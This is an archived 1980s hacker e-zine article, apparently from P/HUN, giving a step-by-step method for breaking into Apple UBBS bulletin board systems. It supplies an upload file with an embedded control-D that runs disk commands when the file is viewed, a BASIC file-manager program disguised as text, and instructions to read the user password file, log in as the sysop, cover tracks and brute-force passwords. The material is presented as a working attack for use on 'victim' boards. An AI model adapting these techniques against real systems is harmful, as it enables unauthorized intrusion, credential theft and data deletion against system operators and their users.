home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Hacker Chronicles 1
/
HACKER1.ISO
/
miscpub1
/
phun203.txt
< prev
next >
Wrap
Text File
|
1992-09-26
|
10KB
|
315 lines
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
= Volume 1 , P/HUN Issue #2 , Phile #3 of 9 =
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Defeating Security on Apple's UBBS
----------------------------------
Writen by Evil Mind of CTG
Computer Terrorists Guild
Introduction
-------------
Hello fellow hackers are phreakers, I'm here to tell you all about Apple's
UBBS. This is a nice little program that will make any Apple computer with a
modem have the ability to be a bbs. It can be on any storage device, from
a 5.25 disk, to a chain of hard drives. I doubt any hackers or phreakers are
using this program, because everyone (in Apple's world) uses GBBS. So, let's
get down to business.
For flexability, UBBS has been written in BASIC. For our convience, hackers
with a knowledge of universial basic (or better yet, knowledge of Apple BASIC)
will have a good time. The only catch is, the control-c (break basic programs)
is screened out by a ml routine before it hits basic. But, no need to fear,
discussion on hacking it is later.
When a sysop first uses a UBBS program, the sysop must run the program
SYSGEN.... which is for System Generation, the "Creator Program" for the
board. Questions are name of board, sysop's name, bullitin's names,
and other things needed before the next program is run: LOGON... which will
then put the computer in answer mode.
Let's say some guy calls a few days later. The LOGON program will then
display a bbs title, then something like "Enter your name or press <RETURN>
for NEW." So, this guy does a <RETURN> for new... questions are asked, and
then the sysop validates him. Normal procedure like any other bbs program.
Hacking it
-----------
Once in the system, get access to the <F>eatures section which hopefully
has a up/downloading section. If they give a lame excuse of not giving
it to you because of an IBM, lie in the validation part, and say you own an
Apple. First, upload some text file... like a list of bbs numbers. If the
file needs to be validated by the sysop before further access from the public,
then it will be hard to hack it out. (Explained later.)
Now, at least you have some access... hopefully the u/d ratio is 1:1 or
better. So, upload two more files!
File #1
--------
This is the most important file in the hacking process. This file should
contain the following or simular to it: (<CR>=<RETURN>) This is a TEXT file.
------------------------------------------------------------------------------
THIS IS A POEM<CR>
<CR>
<Control-D>CAT<CR>
RAT<CR>
DOG<CR>
PAT<CR>
<CR>
BY MR. WALTHER<CR>
------------------------------------------------------------------------------
File explained:
Well, the control D is needed. If you can't enter it from your word processor,
then enter "DCAT" and go in with a disk editor and change character D into
hex $04, which is a control-d to Apple. Normally, control-d is within programs,
used to run disk commands from basic. When viewed, it will catalog the
current storage device (hard, 3.5, or 5.25) and will be stuck in a "zombie"
mode. Also, when downloading this file, view it, don't use Xmodem. But upload
file #2 with it, so you can hack in one call and delete your tracks.
File #2
--------
Well, this program is supposed to be basic, but since a lot of hackers I
know have IBM's, I'll make it hackable from both Apple and IBM. Make the
following TEXT, that's right, text file.
------------------------------------------------------------------------------
10 ONERR GOTO 1000
20 HOME
30 PRINT "A DISK PREFIXER"
40 PRINT
50 PRINT "<P>REFIX <C>ATALOG <V>IEW <D>ELETE <R>UN"
60 INPUT A$
70 IF A$<>"P" OR A$<>"p" THEN 100
80 PRINT "PREFIX WHAT? (RETURN FOR LIST, OR FOLLOW EXAMPLE: /HARD1/BBS"
90 INPUT A$: PRINT CHR$(4);"PREFIX ";A$: GOTO 40
100 IF A$<>"C" OR A$<>"c" THEN 120
110 PRINT CHR$(4);"CATALOG": GOTO 40
120 IF A$<>"D" OR A$<>"d" THEN 150
130 PRINT "DELETE WHAT FILE?"
140 INPUT A$: PRINT CHR$(4);"DELETE ";A$: GOTO 40
150 IF A$<>"R" OR A$<>"r" THEN 180
160 PRINT "RUN WHICH FILE?"
170 INPUT A$: PRINT CHR$(4);"RUN ";A$: GOTO 40
180 IF A$<>"V" AND A$<>"v" THEN PRINT "NOT A COMMAND": GOTO 40
190 PRINT "VIEW WHICH FILE?"
200 INPUT A$: PRINT CHR$(4);"OPEN ";A$: PRINT CHR$(4);"READ ";A$
210 ONERR GOTO 230
220 INPUT B$: PRINT B$: GOTO 220
230 PRINT CHR$(4);"CLOSE ";A$: ONERR GOTO 1000
240 GOTO 40
1000 PRINT "ERROR!": CALL -1370
------------------------------------------------------------------------------
Upload the files. When asked about file #2, say it's a TXT file.
Now view file #1. It will catalog (or DIR) the disk,
and then be in a "zombie" state. This is when the basic thinks the disk is
still being read, and is really stuck, for you to enter things. To clear that
up, the INPUT command is used both for keyboard input, or in the correct
conditions (that UBBS uses), disk input from text files!
If you can't see it yet, press a control-D and a disk command. The real
intention is to run file #2, which will do the hacking. But, File#2 and
File#1 might be in a different directory than the transfer program. Use
these commands: (With a control-D before them)
CAT to see what is on the disk.
Example:
]CAT
/HARD1 (PREFIX NAME)
PROGRAMS DIR 10-NOV-88 2
PRODOS SYS 06-APR-81 32
BASIC.SYSTEM SYS 07-APR-81 20
BASIC.PROGRAMS BAS 10-NOV-88 5
ML.PROGRAMS BIN 10-NOV-88 7
READ.ME TXT 10-NOV-88 10
In which case, should explore further with a
]PREFIX /HARD1/PROGRAMS
]CAT
/HARD1/PROGRAMS
LOGON BAS 10-APR-84 54
SYSOP BAS 10-APR-84 34
Once you explore enough to fine your files, do an:
]EXEC file#2
Replace "file#2" with whatever you named the second file.
Note: exploring will take a long time, because you might need to find some
other things to intrest you, like the logon program (which can be in another
directory). When exploring in the zombie state, the computer sometimes zaps out
back into normal running mode. Re-download and start where you left off.
Then it'll go:
A DISK PREFIXER
<P>REFIX <C>ATALOG <D>ELETE <V>IEW <R>UN
?
Then enter the desired one, in this case, "P" and press enter.
Here's how to work them:
Examples: from basic
]PREFIX /HARD1/FILES (to get to the diectory /hard1/files)
]PREFIX /HARD1/ (to get back to /hard1)
]PREFIX (tells you what the current prefix is)
]CATALOG (DIR a disk for you)
]RUN LOGON (Go back to LOGON program)
View is a different thing, and can't be done from basic. In this case,
choose "V" for view, (beforehand, find the userinfo file, a text file.)
And when it goes:
VIEW WHICH FILE?
?
type in a pathname.... example:
VIEW WHICH FILE?
?/HARD1/BBS/USERINFO.DATA
and it'll show the passwords. Explore! There are a lot of things to do. One
last word before you finish, the sysop is 001, find his password, log in as
him, then make all your accounts from there (because he validates and creates
accounts.)
The form for UBBS passwords are:
NNNCCCC where N is a number, and C is a character.
example: 001SYSOP. Also, 001SYSOP is the default password? (I'm not sure, but
I think it is.) Try it on a new board and see if the sysop didn't change it
yet.
So if your victim board doesn't have the requirements, just use a password
scanner and try out 001AAAA 001AAAB and all, and eventually you can get it
in a matter of weeks. (No lowercase or control characters are accepted by
UBBS.)
All in a nutshell, here's another example:
------------------------------------------------------------------------------
Welcome to a UBBS system.
Enter name or press return for new users
XXXXXXX
checking password.
Hello Mr. Bill, today is 00/00/00
news for today:
This is a new board and hope ya enjoy it,
Your sysop, Tom Hacket.
No Email waiting
Email>Quit
Main level:
B/A/G/J/N/F/Q/Help
>Features
loading xfer, please wait...
Xfer command>
Upload
choose protocol:
X>modem
T>ext
Xmodem
(upload files)
70 blocks recieved....
Information:
What is file#1's type:
TXT
What is file#2's type:
TXT
Thank you.
Xfer command>
Download
Download what file?
TEST.UPLOAD (file#1)
THIS IS A POEM
/HARD1/ONLINE
CALLER.LOG 06 TXT
USER.INFO 65 TXT
LOGON 45 BAS
SYSGEN 65 BAS
TEST.UPLOAD 02 TXT
PREFIXER 03 TXT
LEECHES 02 TXT
(Zombie state) (control-D)EXEC PREFIXER(return)
A DISK PREFIXER
<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?B
NOT A COMMAND!
<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?V
VIEW WHICH FILE?
?USER.INFO
(list of passwords)
<C>ATALOG <V>IEW <R>UN <D>ELETE <P>REFIX
?R
RUN WHICH FILE?
?LOGON
(Automatically hangs up, you re-call, then log in as sysop, and make another
account with good access.)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
DOWNLOADED FROM P-80 SYSTEMS 304-744-2253
Downloaded From P-80 International Information Systems 304-744-2253 12yrs+